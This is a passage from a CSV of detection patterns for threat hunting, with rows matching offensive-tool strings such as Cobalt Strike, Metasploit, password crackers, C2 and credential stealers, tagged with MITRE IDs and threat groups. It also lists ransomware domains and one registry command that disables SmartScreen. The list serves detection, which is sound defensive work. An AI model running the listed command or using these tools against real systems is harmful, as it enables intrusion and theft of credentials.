TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53971" 
"*openSpearPhishDialog*",".{0,1000}openSpearPhishDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53972" "*openssl_heartbleed.rb*",".{0,1000}openssl_heartbleed\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53973" "*openssl2john.py*",".{0,1000}openssl2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53974" "*OpenVAS*",".{0,1000}OpenVAS.{0,1000}","offensive_tool_keyword","openvas","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://www.openvas.org/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53975" "*OpenVPN/SOCKS extension initialized.*",".{0,1000}OpenVPN\/SOCKS\sextension\sinitialized\..{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - 
T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","53976" "*openvpn_stealer*",".{0,1000}openvpn_stealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","53977" "*openwall.John.appdata.xml*",".{0,1000}openwall\.John\.appdata\.xml.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53978" "*openwall.John.desktop*",".{0,1000}openwall\.John\.desktop.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53979" "*openwall/john*",".{0,1000}openwall\/john.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53980" "*openWindowsExecutableStage*",".{0,1000}openWindowsExecutableStage.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments 
that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53981" "*OperaPassView.exe*",".{0,1000}OperaPassView\.exe.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential 
Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53985" "*Operative Framework*",".{0,1000}Operative\sFramework.{0,1000}","offensive_tool_keyword","Operative Framework","Framework based on fingerprint action. this tool is used for get information on a website or a enterprise target with multiple modules.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0007 - TA0011 - TA0007","N/A","N/A","Framework","https://github.com/graniet/operative-framework","1","0","N/A","N/A","N/A","8","706","168","2024-09-30T02:55:39Z","2017-01-03T08:38:59Z","53986" "*OPERATORCHANGEMEPLZZZ*",".{0,1000}OPERATORCHANGEMEPLZZZ.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","#content","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","53987" "*ophcrack*",".{0,1000}ophcrack.{0,1000}","offensive_tool_keyword","ophcrack","Windows password cracker based on rainbow tables.","T1110.003 - T1555.003 - T1110.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://gitlab.com/objectifsecurite/ophcrack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53988" "*o-printernightmare.ps1*",".{0,1000}o\-printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","53989" "*options.bruteforced_protocol*",".{0,1000}options\.bruteforced_protocol.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - 
TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","53990" "*Options.shadowCredCertificatePassword*",".{0,1000}Options\.shadowCredCertificatePassword.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","53991" "*optiv/Ivy.git*",".{0,1000}optiv\/Ivy\.git.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","1","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","53992" "*optiv/Registry-Recon*",".{0,1000}optiv\/Registry\-Recon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","N/A","10","10","325","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z","53993" "*optiv/ScareCrow*",".{0,1000}optiv\/ScareCrow.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 
- FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","53994" "*optiv/ScareCrow*",".{0,1000}optiv\/ScareCrow.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","53995" "*oqwygprskqv65j72.13gpqd.top*",".{0,1000}oqwygprskqv65j72\.13gpqd\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53996" "*oqwygprskqv65j72.1hbdbx.top*",".{0,1000}oqwygprskqv65j72\.1hbdbx\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53997" "*oqwygprskqv65j72.1jfniy.top*",".{0,1000}oqwygprskqv65j72\.1jfniy\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53998" "*oqwygprskqv65j72.1jitcy.top*",".{0,1000}oqwygprskqv65j72\.1jitcy\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53999" "*oqwygprskqv65j72.1ldyev.top*",".{0,1000}oqwygprskqv65j72\.1ldyev\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54000" "*oqwygprskqv65j72.onion*",".{0,1000}oqwygprskqv65j72\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54001" "*oracle_default_hashes.txt*",".{0,1000}oracle_default_hashes\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54002" "*oracle_default_passwords.csv*",".{0,1000}oracle_default_passwords\.csv.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54003" "*Orange-Cyberdefense/arsenal*",".{0,1000}Orange\-Cyberdefense\/arsenal.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","54004" "*Orange-Cyberdefense/KeePwn*",".{0,1000}Orange\-Cyberdefense\/KeePwn.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","54005" "*Orange-Cyberdefense/KeePwn*",".{0,1000}Orange\-Cyberdefense\/KeePwn.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","54006" "*Orange-Cyberdefense/LinikatzV2*",".{0,1000}Orange\-Cyberdefense\/LinikatzV2.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is 
a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","54007" "*orbitaldump.py*",".{0,1000}orbitaldump\.py.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","54008" "*orbitaldump/orbitaldump*",".{0,1000}orbitaldump\/orbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","54009" "*orc_loadURL 'https://gtfobins.github.io*",".{0,1000}orc_loadURL\s\'https\:\/\/gtfobins\.github\.io.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","54010" "*OrderFromC2 = ReadEmail()*",".{0,1000}OrderFromC2\s\=\sReadEmail\(\).{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - 
TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","54011" "*os.system('reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"" /v ""EnableSmartScreenFilter"" /t REG_DWORD /d ""0"" /f')*",".{0,1000}os\.system\(\'reg\sadd\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\sSettings\""\s\/v\s\""EnableSmartScreenFilter\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f\'\).{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","#registry","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","54013" "*OS-Command-Injection-Unix-Payloads.*",".{0,1000}OS\-Command\-Injection\-Unix\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","54014" "*OS-Command-Injection-Windows-Payloads.*",".{0,1000}OS\-Command\-Injection\-Windows\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","54015" 
"*OSCP-Archives*",".{0,1000}OSCP\-Archives.{0,1000}","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043 - ","N/A","N/A","Exploitation tool","https://github.com/CyDefUnicorn/OSCP-Archives","1","1","N/A","N/A","N/A","7","620","194","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z","54016" "*osmedeus cloud*",".{0,1000}osmedeus\scloud.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","54021" "*osmedeus health*",".{0,1000}osmedeus\shealth.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","54022" "*osmedeus provider*",".{0,1000}osmedeus\sprovider.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","54023" "*osmedeus scan*",".{0,1000}osmedeus\sscan.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation 
tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","54024" "*osmedeus utils*",".{0,1000}osmedeus\sutils.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","54025" "*osx/dump_keychain*",".{0,1000}osx\/dump_keychain.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
